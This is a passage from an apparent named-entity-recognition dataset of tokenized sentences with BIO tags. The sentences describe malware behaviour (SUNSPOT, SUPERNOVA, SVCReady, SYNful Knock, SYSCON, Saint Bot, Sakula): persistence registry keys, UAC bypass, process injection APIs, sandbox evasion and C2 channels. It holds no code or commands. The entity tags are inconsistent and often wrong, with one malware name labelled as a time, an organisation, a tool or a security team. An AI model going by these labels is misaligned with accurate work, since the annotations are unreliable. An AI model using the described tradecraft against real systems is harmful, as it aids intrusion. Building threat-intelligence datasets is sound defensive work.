"O" - ] - }, - { - "tokens": [ - "SUNSPOT", - "used", - "Windows", - "API", - "functions", - "such", - "as", - "<code>MoveFileEx</code>", - "and", - "<code>NtQueryInformationProcess</code>", - "as", - "part", - "of", - "the", - "SUNBURST", - "injection", - "process." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "SUNSPOT", - "encrypted", - "log", - "entries", - "it", - "collected", - "with", - "the", - "stream", - "cipher", - "RC4", - "using", - "a", - "hard-coded", - "key.", - "It", - "also", - "uses", - "AES128-CBC", - "encrypted", - "blobs", - "for", - "SUNBURST", - "source", - "code", - "and", - "data", - "extracted", - "from", - "the", - "SolarWinds", - "Orion", - "<MsBuild.exe</code>", - "process." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "SUNSPOT", - "monitored", - "running", - "processes", - "for", - "instances", - "of", - "<code>MsBuild.exe</code>", - "by", - "hashing", - "the", - "name", - "of", - "each", - "running", - "process", - "and", - "comparing", - "it", - "to", - "the", - "corresponding", - "value", - "<code>0x53D525</code>.", - "It", - "also", - "extracted", - "command-line", - "arguments", - "and", - "individual", - "arguments", - "from", - "the", - "running", - "<code>MsBuild.exe</code>", - "process", - "to", - "identify", - "the", - "directory", - "path", - "of", - "the", - "Orion", - "software", - "Visual", - "Studio", - "solution." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUNSPOT", - "created", - "a", - "copy", - "of", - "the", - "SolarWinds", - "Orion", - "software", - "source", - "file", - "with", - "a", - "<code>.bk</code>", - "extension", - "to", - "backup", - "the", - "original", - "content,", - "wrote", - "SUNBURST", - "using", - "the", - "same", - "filename", - "but", - "with", - "a", - "<code>.tmp</code>", - "extension,", - "and", - "then", - "moved", - "SUNBURST", - "using", - "<code>MoveFileEx</code>", - "to", - "the", - "original", - "filename", - "with", - "a", - "<code>.cs</code>", - "extension", - "so", - "it", - "could", - "be", - "compiled", - "within", - "Orion", - "software." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUPERNOVA", - "contained", - "Base64-encoded", - "strings." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUPERNOVA", - "was", - "installed", - "via", - "exploitation", - "of", - "a", - "SolarWinds", - "Orion", - "API", - "authentication", - "bypass", - "vulnerability", - "(CVE-2020-10148)." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "SUPERNOVA", - "has", - "masqueraded", - "as", - "a", - "legitimate", - "SolarWinds", - "DLL." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "SUPERNOVA", - "had", - "to", - "receive", - "an", - "HTTP", - "GET", - "request", - "containing", - "a", - "specific", - "set", - "of", - "parameters", - "in", - "order", - "to", - "execute." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SUPERNOVA", - "is", - "a", - "Web", - "shell." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SVCReady", - "has", - "created", - "the", - "`HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{E6D34FFC-AD32-4d6a-934C-D387FA873A19}`", - "Registry", - "key", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SVCReady", - "can", - "collect", - "data", - "from", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SVCReady", - "can", - "send", - "collected", - "data", - "in", - "JSON", - "format", - "to", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SVCReady", - "has", - "the", - "ability", - "to", - "download", - "additional", - "tools", - "such", - "as", - "the", - "RedLine", - "Stealer", - "to", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "B-Way", - "B-SecTeam", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SVCReady", - "has", - "relied", - "on", - "users", - "clicking", - "a", - "malicious", - "attachment", - "delivered", - "through", - "spearphishing." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "SVCReady", - "has", - "named", - "a", - "task", - "`RecoveryExTask`", - "as", - "part", - "of", - "its", - "persistence", - "activity." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SVCReady", - "can", - "use", - "Windows", - "API", - "calls", - "to", - "gather", - "information", - "from", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SVCReady", - "can", - "encrypt", - "victim", - "data", - "with", - "an", - "RC4", - "cipher." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SVCReady", - "can", - "check", - "for", - "the", - "number", - "of", - "devices", - "plugged", - "into", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SVCReady", - "can", - "collect", - "a", - "list", - "of", - "running", - "processes", - "from", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SVCReady", - "can", - "search", - "for", - "the", - "`HKEY_LOCAL_MACHINE\\HARDWARE\\DESCRIPTION\\System`", - "Registry", - "key", - "to", - "gather", - "system", - "information." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SVCReady", - "has", - "used", - "`rundll32.exe`", - "for", - "execution." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "SVCReady", - "can", - "create", - "a", - "scheduled", - "task", - "named", - "`RecoveryExTask`", - "to", - "gain", - "persistence." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SVCReady", - "can", - "take", - "a", - "screenshot", - "from", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SVCReady", - "can", - "collect", - "a", - "list", - "of", - "installed", - "software", - "from", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SVCReady", - "has", - "been", - "distributed", - "via", - "spearphishing", - "campaigns", - "containing", - "malicious", - "Mircrosoft", - "Word", - "documents." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct", - "O", - "O", - "B-Way", - "I-SamFile", - "O" - ] - }, - { - "tokens": [ - "SVCReady", - "has", - "the", - "ability", - "to", - "determine", - "if", - "its", - "runtime", - "environment", - "is", - "virtualized." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SVCReady", - "has", - "the", - "ability", - "to", - "collect", - "information", - "such", - "as", - "computer", - "name,", - "computer", - "manufacturer,", - "BIOS,", - "operating", - "system,", - "and", - "firmware,", - "including", - "through", - "the", - "use", - "of", - "`systeminfo.exe`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "SVCReady", - "can", - "collect", - "the", - "username", - "from", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SVCReady", - "can", - "collect", - "time", - "zone", - "information." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "SVCReady", - "can", - "enter", - "a", - "sleep", - "stage", - "for", - "30", - "minutes", - "to", - "evade", - "detection." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SVCReady", - "has", - "used", - "VBA", - "macros", - "to", - "execute", - "shellcode." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SVCReady", - "can", - "communicate", - "with", - "its", - "C2", - "servers", - "via", - "HTTP." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "SVCReady", - "can", - "use", - "`WMI`", - "queries", - "to", - "detect", - "the", - "presence", - "of", - "a", - "virtual", - "machine", - "environment." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SYNful", - "Knock", - "has", - "the", - "capability", - "to", - "add", - "its", - "own", - "custom", - "backdoor", - "password", - "when", - "it", - "modifies", - "the", - "operating", - "system", - "of", - "the", - "affected", - "network", - "device." - ], - "ner_tags": [ - "B-Way", - "B-SecTeam", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SYNful", - "Knock", - "is", - "malware", - "that", - "is", - "inserted", - "into", - "a", - "network", - "device", - "by", - "patching", - "the", - "operating", - "system", - "image." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SYNful", - "Knock", - "can", - "be", - "sent", - "instructions", - "via", - "special", - "packets", - "to", - "change", - "its", - "functionality.", - "Code", - "for", - "new", - "functionality", - "can", - "be", - "included", - "in", - "these", - "messages." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SYSCON", - "has", - "the", - "ability", - "to", - "use", - "FTP", - "in", - "C2", - "communications." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SYSCON", - "has", - "been", - "executed", - "by", - "luring", - "victims", - "to", - "open", - "malicious", - "e-mail", - "attachments." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "SYSCON", - "has", - "the", - "ability", - "to", - "use", - "Tasklist", - "to", - "list", - "running", - "processes." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SYSCON", - "has", - "the", - "ability", - "to", - "use", - "Systeminfo", - "to", - "identify", - "system", - "information." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "SYSCON", - "has", - "the", - "ability", - "to", - "execute", - "commands", - "through", - "cmd", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Saint", - "Bot", - "has", - "written", - "its", - "payload", - "into", - "a", - "newly-created", - "`EhStorAuthn.exe`", - "process", - "using", - "`ZwWriteVirtualMemory`", - "and", - "executed", - "it", - "using", - "`NtQueueApcThread`", - "and", - "`ZwAlertResumeThread`." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Saint", - "Bot", - "has", - "attempted", - "to", - "bypass", - "UAC", - "using", - "`fodhelper.exe`", - "to", - "escalate", - "privileges." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Saint", - "Bot", - "can", - "collect", - "files", - "and", - "information", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Saint", - "Bot", - "has", - "used", - "`is_debugger_present`", - "as", - "part", - "of", - "its", - "environmental", - "checks." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Saint", - "Bot", - "can", - "deobfuscate", - "strings", - "and", - "files", - "for", - "execution." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Saint", - "Bot", - "has", - "injected", - "its", - "DLL", - "component", - "into", - "`EhStorAurhn.exe`." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Saint", - "Bot", - "can", - "run", - "a", - "batch", - "script", - "named", - "`del.bat`", - "to", - "remove", - "any", - "Saint", - "Bot", - "payload-linked", - "files", - "from", - "a", - "compromise", - "system", - "if", - "anti-analysis", - "or", - "locale", - "checks", - "fail." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Saint", - "Bot", - "can", - "search", - "a", - "compromised", - "host", - "for", - "specific", - "files." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Saint", - "Bot", - "can", - "download", - "additional", - "files", - "onto", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Saint", - "Bot", - "had", - "used", - "`InstallUtil.exe`", - "to", - "download", - "and", - "deploy", - "executables." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Saint", - "Bot", - "has", - "relied", - "upon", - "users", - "to", - "execute", - "a", - "malicious", - "attachment", - "delivered", - "via", - "spearphishing." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Saint", - "Bot", - "has", - "relied", - "on", - "users", - "to", - "click", - "on", - "a", - "malicious", - "link", - "delivered", - "via", - "a", - "spearphishing." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Saint", - "Bot", - "has", - "renamed", - "malicious", - "binaries", - "as", - "`wallpaper.mp4`", - "and", - "`slideshow.mp4`", - "to", - "avoid", - "detection." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Saint", - "Bot", - "has", - "been", - "disguised", - "as", - "a", - "legitimate", - "executable,", - "including", - "as", - "Windows", - "SDK." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Saint", - "Bot", - "has", - "used", - "different", - "API", - "calls,", - "including", - "`GetProcAddress`,", - "`VirtualAllocEx`,", - "`WriteProcessMemory`,", - "`CreateProcessA`,", - "and", - "`SetThreadContext`." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Saint", - "Bot", - "has", - "been", - "obfuscated", - "to", - "help", - "avoid", - "detection." - ], - "ner_tags": [ - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Saint", - "Bot", - "has", - "used", - "PowerShell", - "for", - "execution." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Saint", - "Bot", - "has", - "enumerated", - "running", - "processes", - "on", - "a", - "compromised", - "host", - "to", - "determine", - "if", - "it", - "is", - "running", - "under", - "the", - "process", - "name", - "`dfrgui.exe`." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "The", - "Saint", - "Bot", - "loader", - "has", - "used", - "API", - "calls", - "to", - "spawn", - "`MSBuild.exe`", - "in", - "a", - "suspended", - "state", - "before", - "injecting", - "the", - "decrypted", - "Saint", - "Bot", - "binary", - "into", - "it." - ], - "ner_tags": [ - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Saint", - "Bot", - "has", - "used", - "`check_registry_keys`", - "as", - "part", - "of", - "its", - "environmental", - "checks." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Saint", - "Bot", - "has", - "established", - "persistence", - "by", - "being", - "copied", - "to", - "the", - "Startup", - "directory", - "or", - "through", - "the", - "`\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`", - "registry", - "key." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Saint", - "Bot", - "has", - "used", - "`regsvr32`", - "to", - "execute", - "scripts." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Saint", - "Bot", - "has", - "created", - "a", - "scheduled", - "task", - "named", - "\"Maintenance\"", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Saint", - "Bot", - "has", - "been", - "packed", - "using", - "a", - "dark", - "market", - "crypter." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Saint", - "Bot", - "has", - "been", - "distributed", - "as", - "malicious", - "attachments", - "within", - "spearphishing", - "emails." - ], - "ner_tags": [ - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Saint", - "Bot", - "has", - "been", - "distributed", - "through", - "malicious", - "links", - "contained", - "within", - "spearphishing", - "emails." - ], - "ner_tags": [ - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Saint", - "Bot", - "has", - "used", - "Base64", - "to", - "encode", - "its", - "C2", - "communications." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Saint", - "Bot", - "has", - "run", - "several", - "virtual", - "machine", - "and", - "sandbox", - "checks,", - "including", - "checking", - "if", - "`Sbiedll.dll`", - "is", - "present", - "in", - "a", - "list", - "of", - "loaded", - "modules,", - "comparing", - "the", - "machine", - "name", - "to", - "`HAL9TH`", - "and", - "the", - "user", - "name", - "to", - "`JohnDoe`,", - "and", - "checking", - "the", - "BIOS", - "version", - "for", - "known", - "virtual", - "machine", - "identifiers." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Saint", - "Bot", - "can", - "identify", - "the", - "OS", - "version,", - "CPU,", - "and", - "other", - "details", - "from", - "a", - "victim's", - "machine." - ], - "ner_tags": [ - "B-SecTeam", - "B-Tool", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Saint", - "Bot", - "has", - "conducted", - "system", - "locale", - "checks", - "to", - "see", - "if", - "the", - "compromised", - "host", - "is", - "in", - "Russia,", - "Ukraine,", - "Belarus,", - "Armenia,", - "Kazakhstan,", - "or", - "Moldova." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Area", - "B-Area", - "B-Area", - "B-Area", - "B-Area", - "O", - "B-Area" - ] - }, - { - "tokens": [ - "Saint", - "Bot", - "can", - "collect", - "the", - "IP", - "address", - "of", - "a", - "victim", - "machine." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Saint", - "Bot", - "can", - "collect", - "the", - "username", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Saint", - "Bot", - "has", - "used", - "the", - "command", - "`timeout", - "20`", - "to", - "pause", - "the", - "execution", - "of", - "its", - "initial", - "loader." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Saint", - "Bot", - "has", - "used", - "`.vbs`", - "scripts", - "for", - "execution." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Saint", - "Bot", - "has", - "used", - "HTTP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Saint", - "Bot", - "has", - "used", - "`cmd.exe`", - "and", - "`.bat`", - "scripts", - "for", - "execution." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-SamFile", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sakula", - "contains", - "UAC", - "bypass", - "code", - "for", - "both", - "32-", - "and", - "64-bit", - "systems." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sakula", - "uses", - "DLL", - "side-loading,", - "typically", - "using", - "a", - "digitally", - "signed", - "sample", - "of", - "Kaspersky", - "Anti-Virus", - "(AV)", - "6.0", - "for", - "Windows", - "Workstations", - "or", - "McAfee's", - "Outlook", - "Scan", - "About", - "Box", - "to", - "load", - "malicious", - "DLL", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "O", - "B-SecTeam", - "O", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sakula", - "uses", - "single-byte", - "XOR", - "obfuscation", - "to", - "obfuscate", - "many", - "of", - "its", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Some", - "Sakula", - "samples", - "use", - "cmd.exe", - "to", - "delete", - "temporary", - "files." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sakula", - "has", - "the", - "capability", - "to", - "download", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Most", - "Sakula", - "samples", - "maintain", - "persistence", - "by", - "setting", - "the", - "Registry", - "Run", - "key", - "<code>SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\</code>", - "in", - "the", - "HKLM", - "or", - "HKCU", - "hive,", - "with", - "the", - "Registry", - "value", - "and", - "file", - "name", - "varying", - "by", - "sample." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sakula", - "calls", - "cmd.exe", - "to", - "run", - "various", - "DLL", - "files", - "via", - "rundll32." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Sakula", - "encodes", - "C2", - "traffic", - "with", - "single-byte", - "XOR", - "keys." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sakula", - "uses", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - 